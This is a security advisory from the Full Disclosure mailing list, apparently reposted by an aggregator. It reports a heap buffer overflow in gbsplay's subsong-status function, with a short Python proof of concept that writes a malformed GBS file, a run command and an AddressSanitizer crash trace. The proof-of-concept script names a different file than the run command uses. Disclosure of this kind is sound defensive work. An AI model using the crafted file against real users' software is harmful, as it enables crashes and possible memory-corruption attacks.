gbsplay 0.0.100-18 Heap Buffer Overflow in update_status_on_subsong_change in gbsplay
gbsplay 0.0.100-18版本存在堆缓冲区溢出漏洞,攻击者通过构造恶意GBS文件可触发崩溃或代码执行。 2025-9-16 03:1:15 Author: seclists.org(查看原文) 阅读量:2 收藏
gbsplay 0.0.100-18版本存在堆缓冲区溢出漏洞,攻击者通过构造恶意GBS文件可触发崩溃或代码执行。 2025-9-16 03:1:15 Author: seclists.org(查看原文) 阅读量:2 收藏
Full Disclosure mailing list archives
From: Ron E <ronaldjedgerson () gmail com>
Date: Sat, 13 Sep 2025 09:41:12 -0400
A heap buffer overflow vulnerability exists in gbsplay 0.0.100-18-g50352f3
(latest development snapshot at the time of testing). When opening a
crafted GBS file with inconsistent subsong metadata, the function
update_status_on_subsong_change (gbs.c:501) reads past the bounds of a
heap-allocated structure. The bug is triggered during subsong status update
when the reported total_songs or subsong indices are malformed.
AddressSanitizer (ASan) reports an out-of-bounds read of size 8 just before
the allocated region.
An attacker can exploit this vulnerability by tricking a victim into
playing a malicious .gbs file. Depending on the environment, this may
result in Denial of Service (DoS) (application crash) or potentially
arbitrary code execution due to memory corruption.
*Impact*
- Immediate crash on crafted file.
- Attackers may influence heap layout and overflow conditions.
*Proof of Concept*
Create a minimal, malformed GBS file:
import struct, os
with open("crash.gbs", "wb") as f:
f.write(b"GBS" + bytes([1])) # Magic + version
f.write(bytes([1])) # total_songs = 1
f.write(bytes([1])) # starting_song = 1
f.write(struct.pack("<HHHH", 0x4000, 0x4010, 0x4020, 0xFFFE))
f.write(bytes([0, 0]))
f.write(b"PoC".ljust(32, b"\x00")*3)
f.write(b"\x00"*0x1000) # pad
ASAN_OPTIONS=abort_on_error=1,detect_leaks=0 \
UBSAN_OPTIONS=print_stacktrace=1 \
./gbsplay -o stdout seeds/minimal.gbs
*Observe crash:*
=================================================================
==690137==ERROR: AddressSanitizer: heap-buffer-overflow on address
0x502000001308 at pc 0xaaaad32b29c4 bp 0xffffe6778f90 sp 0xffffe6778f88
READ of size 8 at 0x502000001308 thread T0
#0 0xaaaad32b29c0 in update_status_on_subsong_change
/root/gbsplay/gbs.c:501:54
#1 0xaaaad32b21f8 in gbs_configure /root/gbsplay/gbs.c:131:2
#2 0xaaaad32a5584 in common_init /root/gbsplay/player.c:610:2
#3 0xaaaad329e220 in main /root/gbsplay/gbsplay.c:226:8
#4 0xffffaac62290 in __libc_start_call_main
csu/../sysdeps/nptl/libc_start_call_main.h:58:16
#5 0xffffaac62374 in __libc_start_main csu/../csu/libc-start.c:360:3
#6 0xaaaad31bedec in _start (/root/gbsplay/gbsplay+0x3edec) (BuildId:
c8259c242d7a0acbf2dd69253dd04032772c13a3)
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/
Current thread:
- gbsplay 0.0.100-18 Heap Buffer Overflow in update_status_on_subsong_change in gbsplay Ron E (Sep 15)
文章来源: https://seclists.org/fulldisclosure/2025/Sep/44
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh